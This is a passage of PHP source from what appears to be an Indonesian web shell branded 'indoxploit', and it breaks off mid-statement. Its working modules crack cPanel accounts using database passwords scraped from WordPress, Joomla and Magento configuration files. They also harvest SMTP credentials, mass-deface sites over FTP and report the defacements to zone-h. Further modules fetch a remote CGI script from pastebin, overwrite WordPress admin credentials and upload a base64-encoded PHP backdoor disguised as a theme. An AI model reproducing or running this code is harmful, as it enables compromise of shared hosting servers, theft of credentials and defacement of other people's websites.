\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpanel\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t$dom = "gabisa ambil nama domain nya";\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t$dom = "$dj";\r\n\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t$dom = "function is Disable by system";\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\techo "username ($ucp) password ($pcp) domain ($dom)
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "
Succes!".$i." Cpanel from Allah SWT";\r\n\t\t}\r\n\t} else {\r\n\t\techo "\r\n\t\t
\r\n\t\tUSER:
\r\n\t\t";\r\n\t\t$_usercp = fopen("/etc/passwd","r");\r\n\t\twhile($getu = fgets($_usercp)) {\r\n\t\t\tif($getu == \'\' || !$_usercp) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all("/(.*?):x:/", $getu, $u);\r\n\t\t\t\tforeach($u[1] as $user_cp) {\r\n\t\t\t\t\t\tif(is_dir("/home/$user_cp/public_html")) {\r\n\t\t\t\t\t\t\techo "$user_cp\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "
\r\n\t\tPASS:
\r\n\t\t";\r\n\t\tfunction cp_pass($dir) {\r\n\t\t\t$pass = "";\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t\tif(preg_match("/WordPress/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"password = \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\\n";\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,\'password = "\',\'"\')."\\n";\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"\'DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/client/", $ambil)) {\r\n\t\t\t\t\tpreg_match("/password=(.*)/", $ambil, $pass1);\r\n\t\t\t\t\tif(preg_match(\'/"/\', $pass1[1])) {\r\n\t\t\t\t\t\t$pass1[1] = str_replace(\'"\', "", $pass1[1]);\r\n\t\t\t\t\t\t$pass .= $pass1[1]."\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match("/cc_encryption_hash/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"db_password = \'","\'")."\\n";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo $pass;\r\n\t\t}\r\n\t\t$cp_pass = cp_pass($dir);\r\n\t\techo $cp_pass;\r\n\t\techo "
\r\n\t\t\r\n\t\t
\r\n\t\tNB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'cpftp_auto\') {\r\n\tif($_POST[\'crack\']) {\r\n\t\t$usercp = explode("\\r\\n", $_POST[\'user_cp\']);\r\n\t\t$passcp = explode("\\r\\n", $_POST[\'pass_cp\']);\r\n\t\t$i = 0;\r\n\t\tforeach($usercp as $ucp) {\r\n\t\t\tforeach($passcp as $pcp) {\r\n\t\t\t\tif(@mysql_connect(\'localhost\', $ucp, $pcp)) {\r\n\t\t\t\t\tif($_SESSION[$ucp] && $_SESSION[$pcp]) {\r\n\t\t\t\t\t} else {\r\n\t\t\t\t\t\t$_SESSION[$ucp] = "1";\r\n\t\t\t\t\t\t$_SESSION[$pcp] = "1";\r\n\t\t\t\t\t\tif($ucp == \'\' || $pcp == \'\') {\r\n\t\t\t\t\t\t\t//\r\n\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\techo "[+] username ($ucp) password ($pcp)
";\r\n\t\t\t\t\t\t\t$ftp_conn = ftp_connect(gethostbyname($_SERVER[\'HTTP_HOST\']));\r\n\t\t\t\t\t\t\t$ftp_login = ftp_login($ftp_conn, $ucp, $pcp);\r\n\t\t\t\t\t\t\tif((!$ftp_login) || (!$ftp_conn)) {\r\n\t\t\t\t\t\t\t\techo "[+] Login Gagal

";\r\n\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\techo "[+] Login Sukses
";\r\n\t\t\t\t\t\t\t\t$fi = htmlspecialchars($_POST[\'file_deface\']);\r\n\t\t\t\t\t\t\t\t$deface = ftp_put($ftp_conn, "public_html/$fi", $_POST[\'deface\'], FTP_BINARY);\r\n\t\t\t\t\t\t\t\tif($deface) {\r\n\t\t\t\t\t\t\t\t\t$i++;\r\n\t\t\t\t\t\t\t\t\techo "[+] Deface Sukses
";\r\n\t\t\t\t\t\t\t\t\tif(function_exists(\'posix_getpwuid\')) {\r\n\t\t\t\t\t\t\t\t\t\t$domain_cp = file_get_contents("/etc/named.conf");\t\r\n\t\t\t\t\t\t\t\t\t\tif($domain_cp == \'\') {\r\n\t\t\t\t\t\t\t\t\t\t\techo "[+] gabisa ambil nama domain nya

";\r\n\t\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\t\tpreg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);\r\n\t\t\t\t\t\t\t\t\t\t\tforeach($domains_cp[1] as $dj) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));\r\n\t\t\t\t\t\t\t\t\t\t\t\t$user_cp_url = $user_cp_url[\'name\'];\r\n\t\t\t\t\t\t\t\t\t\t\t\tif($user_cp_url == $ucp) {\r\n\t\t\t\t\t\t\t\t\t\t\t\t\techo "[+] http://$dj/$fi

";\r\n\t\t\t\t\t\t\t\t\t\t\t\t\tbreak;\r\n\t\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\t\techo "[+] gabisa ambil nama domain nya

";\r\n\t\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t\t} else {\r\n\t\t\t\t\t\t\t\t\techo "[-] Deface Gagal

";\r\n\t\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t}\r\n\t\t\t\t\t\t\t//echo "username ($ucp) password ($pcp)
";\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tif($i == 0) {\r\n\t\t} else {\r\n\t\t\techo "
Succes Deface! ".$i." Cpanel From ALLAH SWT";\r\n\t\t}\r\n\t} else {\r\n\t\techo "\r\n\t\t
\r\n\t\tFilename:
\r\n\t\t
\r\n\t\tDeface Page:
\r\n\t\t
\r\n\t\tUSER:
\r\n\t\t";\r\n\t\t$_usercp = fopen("/etc/passwd","r");\r\n\t\twhile($getu = fgets($_usercp)) {\r\n\t\t\tif($getu == \'\' || !$_usercp) {\r\n\t\t\t\techo "<font color=red>Can\'t read /etc/passwd</font>";\r\n\t\t\t} else {\r\n\t\t\t\tpreg_match_all("/(.*?):x:/", $getu, $u);\r\n\t\t\t\tforeach($u[1] as $user_cp) {\r\n\t\t\t\t\t\tif(is_dir("/home/$user_cp/public_html")) {\r\n\t\t\t\t\t\t\techo "$user_cp\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\techo "
\r\n\t\tPASS:
\r\n\t\t";\r\n\t\tfunction cp_pass($dir) {\r\n\t\t\t$pass = "";\r\n\t\t\t$dira = scandir($dir);\r\n\t\t\tforeach($dira as $dirb) {\r\n\t\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t\tif(preg_match("/WordPress/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"password = \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/Magento|Mage_Core/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\\n";\r\n\t\t\t\t} elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,\'password = "\',\'"\')."\\n";\r\n\t\t\t\t} elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"\'DB_PASSWORD\', \'","\'")."\\n";\r\n\t\t\t\t} elseif(preg_match("/client/", $ambil)) {\r\n\t\t\t\t\tpreg_match("/password=(.*)/", $ambil, $pass1);\r\n\t\t\t\t\tif(preg_match(\'/"/\', $pass1[1])) {\r\n\t\t\t\t\t\t$pass1[1] = str_replace(\'"\', "", $pass1[1]);\r\n\t\t\t\t\t\t$pass .= $pass1[1]."\\n";\r\n\t\t\t\t\t}\r\n\t\t\t\t} elseif(preg_match("/cc_encryption_hash/", $ambil)) {\r\n\t\t\t\t\t$pass .= ambilkata($ambil,"db_password = \'","\'")."\\n";\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\techo $pass;\r\n\t\t}\r\n\t\t$cp_pass = cp_pass($dir);\r\n\t\techo $cp_pass;\r\n\t\techo "
\r\n\t\t\r\n\t\t
\r\n\t\tNB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'smtp\') {\r\n\techo "NB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
";\r\n\tfunction scj($dir) {\r\n\t\t$dira = scandir($dir);\r\n\t\tforeach($dira as $dirb) {\r\n\t\t\tif(!is_file("$dir/$dirb")) continue;\r\n\t\t\t$ambil = file_get_contents("$dir/$dirb");\r\n\t\t\t$ambil = str_replace("$", "", $ambil);\r\n\t\t\tif(preg_match("/JConfig|joomla/", $ambil)) {\r\n\t\t\t\t$smtp_host = ambilkata($ambil,"smtphost = \'","\'");\r\n\t\t\t\t$smtp_auth = ambilkata($ambil,"smtpauth = \'","\'");\r\n\t\t\t\t$smtp_user = ambilkata($ambil,"smtpuser = \'","\'");\r\n\t\t\t\t$smtp_pass = ambilkata($ambil,"smtppass = \'","\'");\r\n\t\t\t\t$smtp_port = ambilkata($ambil,"smtpport = \'","\'");\r\n\t\t\t\t$smtp_secure = ambilkata($ambil,"smtpsecure = \'","\'");\r\n\t\t\t\techo "SMTP Host: $smtp_host
";\r\n\t\t\t\techo "SMTP port: $smtp_port
";\r\n\t\t\t\techo "SMTP user: $smtp_user
";\r\n\t\t\t\techo "SMTP pass: $smtp_pass
";\r\n\t\t\t\techo "SMTP auth: $smtp_auth
";\r\n\t\t\t\techo "SMTP secure: $smtp_secure

";\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n\t$smpt_hunter = scj($dir);\r\n\techo $smpt_hunter;\r\n} elseif($_GET[\'do\'] == \'auto_wp\') {\r\n\tif($_POST[\'hajar\']) {\r\n\t\t$title = htmlspecialchars($_POST[\'new_title\']);\r\n\t\t$pn_title = str_replace(" ", "-", $title);\r\n\t\tif($_POST[\'cek_edit\'] == "Y") {\r\n\t\t\t$script = $_POST[\'edit_content\'];\r\n\t\t} else {\r\n\t\t\t$script = $title;\r\n\t\t}\r\n\t\t$conf = $_POST[\'config_dir\'];\r\n\t\t$scan_conf = scandir($conf);\r\n\t\tforeach($scan_conf as $file_conf) {\r\n\t\t\tif(!is_file("$conf/$file_conf")) continue;\r\n\t\t\t$config = file_get_contents("$conf/$file_conf");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."posts";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET post_title=\'$title\',post_content=\'$script\',post_name=\'$pn_title\',post_status=\'publish\',comment_status=\'open\',ping_status=\'open\',post_type=\'post\',comment_count=\'1\' WHERE id=\'$id\'");\r\n\t\t\t\t$update .= mysql_query("UPDATE $option SET option_value=\'$title\' WHERE option_name=\'blogname\' OR option_name=\'blogdescription\'");\r\n\t\t\t\techo "
";\r\n\t\t\t\tif($target == \'\') {\r\n\t\t\t\t\techo "URL: error, gabisa ambil nama domain nya -> ";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "URL: $target/?p=$id -> ";\r\n\t\t\t\t}\r\n\t\t\t\tif(!$update OR !$conn OR !$db) {\r\n\t\t\t\t\techo "MySQL Error: ".mysql_error()."
";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "sukses di ganti.
";\r\n\t\t\t\t}\r\n\t\t\t\techo "
";\r\n\t\t\t\tmysql_close($conn);\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "\r\n\t\t
Auto Edit Title+Content WordPress
\r\n\t\t
\r\n\t\tDIR Config:
\r\n\t\t

\r\n\t\tSet Title:
\r\n\t\t

\r\n\t\tEdit Content?: YN
\r\n\t\tJika pilih Y masukin script defacemu ( saran yang simple aja ), kalo pilih N gausah di isi.
\r\n\t\t
\r\n\t\t
\r\n\t\t
\r\n\t\tNB: Tools ini work jika dijalankan di dalam folder config ( ex: /home/user/public_html/nama_folder_config )
\r\n\t\t";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'zoneh\') {\r\n\tif($_POST[\'submit\']) {\r\n\t\t$domain = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$nick = $_POST[\'nick\'];\r\n\t\techo "Defacer Onhold: http://www.zone-h.org/archive/notifier=$nick/published=0
";\r\n\t\techo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

";\r\n\t\tfunction zoneh($url,$nick) {\r\n\t\t\t$ch = curl_init("http://www.zone-h.com/notify/single");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, true);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");\r\n\t\t\treturn curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t}\r\n\t\tforeach($domain as $url) {\r\n\t\t\t$zoneh = zoneh($url,$nick);\r\n\t\t\tif(preg_match("/color=\\"red\\">OK<\\/font><\\/li>/i", $zoneh)) {\r\n\t\t\t\techo "$url -> OK
";\r\n\t\t\t} else {\r\n\t\t\t\techo "$url -> ERROR
";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\tDefacer:
\r\n\t\t
\r\n\t\tDomains:
\r\n\t\t
\r\n\t\t\r\n\t\t
";\r\n\t}\r\n\techo "";\r\n} elseif($_GET[\'do\'] == \'cgi\') {\r\n\t$cgi_dir = mkdir(\'idx_cgi\', 0755);\r\n\t$file_cgi = "idx_cgi/cgi.izo";\r\n\t$isi_htcgi = "AddHandler cgi-script .izo";\r\n\t$htcgi = fopen(".htaccess", "w");\r\n\t$cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");\r\n\t$cgi = fopen($file_cgi, "w");\r\n\tfwrite($cgi, $cgi_script);\r\n\tfwrite($htcgi, $isi_htcgi);\r\n\tchmod($file_cgi, 0755);\r\n\techo "";\r\n} elseif($_GET[\'do\'] == \'fake_root\') {\r\n\tob_start();\r\n\tfunction reverse($url) {\r\n\t\t$ch = curl_init("http://domains.yougetsignal.com/domains.php");\r\n\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, "remoteAddress=$url&ket=");\r\n\t\t\t curl_setopt($ch, CURLOPT_HEADER, 0);\r\n\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t$resp = curl_exec($ch);\r\n\t\t$resp = str_replace("[","", str_replace("]","", str_replace("\\"\\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",", str_replace("\'","", str_replace("\'","", str_replace(":",",", str_replace(\'"\',\'\', $resp ) ) ) ) ) ) ) ) ) ))));\r\n\t\t$array = explode(",,", $resp);\r\n\t\tunset($array[0]);\r\n\t\tforeach($array as $lnk) {\r\n\t\t\t$lnk = "http://$lnk";\r\n\t\t\t$lnk = str_replace(",", "", $lnk);\r\n\t\t\techo $lnk."\\n";\r\n\t\t\tob_flush();\r\n\t\t\tflush();\r\n\t\t}\r\n\t\t\t curl_close($ch);\r\n\t}\r\n\tfunction cek($url) {\r\n\t\t$ch = curl_init($url);\r\n\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );\r\n\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);\r\n\t\t$resp = curl_exec($ch);\r\n\t\treturn $resp;\r\n\t}\r\n\t$cwd = getcwd();\r\n\t$ambil_user = explode("/", $cwd);\r\n\t$user = $ambil_user[2];\r\n\tif($_POST[\'reverse\']) {\r\n\t\t$site = explode("\\r\\n", $_POST[\'url\']);\r\n\t\t$file = $_POST[\'file\'];\r\n\t\tforeach($site as $url) {\r\n\t\t\t$cek = cek("$url/~$user/$file");\r\n\t\t\tif(preg_match("/hacked/i", $cek)) {\r\n\t\t\t\techo "URL: $url/~$user/$file -> Fake Root!
";\r\n\t\t\t}\r\n\t\t}\r\n\t} else {\r\n\t\techo "
\r\n\t\tFilename:

\r\n\t\tUser:

\r\n\t\tDomain:
\r\n\t\t";\r\n\t\treverse($_SERVER[\'HTTP_HOST\']);\r\n\t\techo "
\r\n\t\t\r\n\t\t

\r\n\t\tNB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.";\r\n\t}\r\n} elseif($_GET[\'do\'] == \'adminer\') {\r\n\t$full = str_replace($_SERVER[\'DOCUMENT_ROOT\'], "", $dir);\r\n\tfunction adminer($url, $isi) {\r\n\t\t$fp = fopen($isi, "w");\r\n\t\t$ch = curl_init();\r\n\t\t \t curl_setopt($ch, CURLOPT_URL, $url);\r\n\t\t \t curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\r\n\t\t \t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);\r\n\t\t \t curl_setopt($ch, CURLOPT_FILE, $fp);\r\n\t\treturn curl_exec($ch);\r\n\t\t \t curl_close($ch);\r\n\t\tfclose($fp);\r\n\t\tob_flush();\r\n\t\tflush();\r\n\t}\r\n\tif(file_exists(\'adminer.php\')) {\r\n\t\techo "-> adminer login <-";\r\n\t} else {\r\n\t\tif(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {\r\n\t\t\techo "-> adminer login <-";\r\n\t\t} else {\r\n\t\t\techo "gagal buat file adminer";\r\n\t\t}\r\n\t}\r\n} elseif($_GET[\'do\'] == \'auto_dwp\') {\r\n\tif($_POST[\'auto_deface_wp\']) {\r\n\t\tfunction anucurl($sites) {\r\n \t\t$ch = curl_init($sites);\r\n\t \t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t \t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t \t\t curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t \t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\tfunction lohgin($cek, $web, $userr, $pass, $wp_submit) {\r\n \t\t$post = array(\r\n "log" => "$userr",\r\n "pwd" => "$pass",\r\n "rememberme" => "forever",\r\n "wp-submit" => "$wp_submit",\r\n "redirect_to" => "$web",\r\n "testcookie" => "1",\r\n );\r\n\t\t\t$ch = curl_init($cek);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, $post);\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEJAR,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIEFILE,\'cookie.txt\');\r\n\t\t\t\t curl_setopt($ch, CURLOPT_COOKIESESSION, true);\r\n\t\t\t$data = curl_exec($ch);\r\n\t\t\t\t curl_close($ch);\r\n\t\t\treturn $data;\r\n\t\t}\r\n\t\t$scan = $_POST[\'link_config\'];\r\n\t\t$link_config = scandir($scan);\r\n\t\t$script = htmlspecialchars($_POST[\'script\']);\r\n\t\t$user = "indoxploit";\r\n\t\t$pass = "indoxploit";\r\n\t\t$passx = md5($pass);\r\n\t\tforeach($link_config as $dir_config) {\r\n\t\t\tif(!is_file("$scan/$dir_config")) continue;\r\n\t\t\t$config = file_get_contents("$scan/$dir_config");\r\n\t\t\tif(preg_match("/WordPress/", $config)) {\r\n\t\t\t\t$dbhost = ambilkata($config,"DB_HOST\', \'","\'");\r\n\t\t\t\t$dbuser = ambilkata($config,"DB_USER\', \'","\'");\r\n\t\t\t\t$dbpass = ambilkata($config,"DB_PASSWORD\', \'","\'");\r\n\t\t\t\t$dbname = ambilkata($config,"DB_NAME\', \'","\'");\r\n\t\t\t\t$dbprefix = ambilkata($config,"table_prefix = \'","\'");\r\n\t\t\t\t$prefix = $dbprefix."users";\r\n\t\t\t\t$option = $dbprefix."options";\r\n\t\t\t\t$conn = mysql_connect($dbhost,$dbuser,$dbpass);\r\n\t\t\t\t$db = mysql_select_db($dbname);\r\n\t\t\t\t$q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");\r\n\t\t\t\t$result = mysql_fetch_array($q);\r\n\t\t\t\t$id = $result[ID];\r\n\t\t\t\t$q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");\r\n\t\t\t\t$result2 = mysql_fetch_array($q2);\r\n\t\t\t\t$target = $result2[option_value];\r\n\t\t\t\tif($target == \'\') {\t\t\t\t\t\r\n\t\t\t\t\techo "[-] error, gabisa ambil nama domain nya
";\r\n\t\t\t\t} else {\r\n\t\t\t\t\techo "[+] $target
";\r\n\t\t\t\t}\r\n\t\t\t\t$update = mysql_query("UPDATE $prefix SET user_login=\'$user\',user_pass=\'$passx\' WHERE ID=\'$id\'");\r\n\t\t\t\tif(!$conn OR !$db OR !$update) {\r\n\t\t\t\t\techo "[-] MySQL Error: ".mysql_error()."

";\r\n\t\t\t\t\tmysql_close($conn);\r\n\t\t\t\t} else {\r\n\t\t\t\t\t$site = "$target/wp-login.php";\r\n\t\t\t\t\t$site2 = "$target/wp-admin/theme-install.php?upload";\r\n\t\t\t\t\t$b1 = anucurl($site2);\r\n\t\t\t\t\t$wp_sub = ambilkata($b1, "id=\\"wp-submit\\" class=\\"button button-primary button-large\\" value=\\"","\\" />");\r\n\t\t\t\t\t$b = lohgin($site, $site2, $user, $pass, $wp_sub);\r\n\t\t\t\t\t$anu2 = ambilkata($b,"name=\\"_wpnonce\\" value=\\"","\\" />");\r\n\t\t\t\t\t$upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");\r\n\t\t\t\t\t$www = "m.php";\r\n\t\t\t\t\t$fp5 = fopen($www,"w");\r\n\t\t\t\t\tfputs($fp5,$upload3);\r\n\t\t\t\t\t$post2 = array(\r\n\t\t\t\t\t\t\t"_wpnonce" => "$anu2",\r\n\t\t\t\t\t\t\t"_wp_http_referer" => "/wp-admin/theme-install.php?upload",\r\n\t\t\t\t\t\t\t"themezip" => "@$www",\r\n\t\t\t\t\t\t\t"install-theme-submit" => "Install Now",\r\n\t\t\t\t\t\t\t);\r\n\t\t\t\t\t$ch = curl_init("$target/wp-admin/update.php?action=upload-theme");\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_POST, 1);\r\n\t\t\t\t\t\t curl_setopt($ch, CURLOPT_POSTFIELDS, 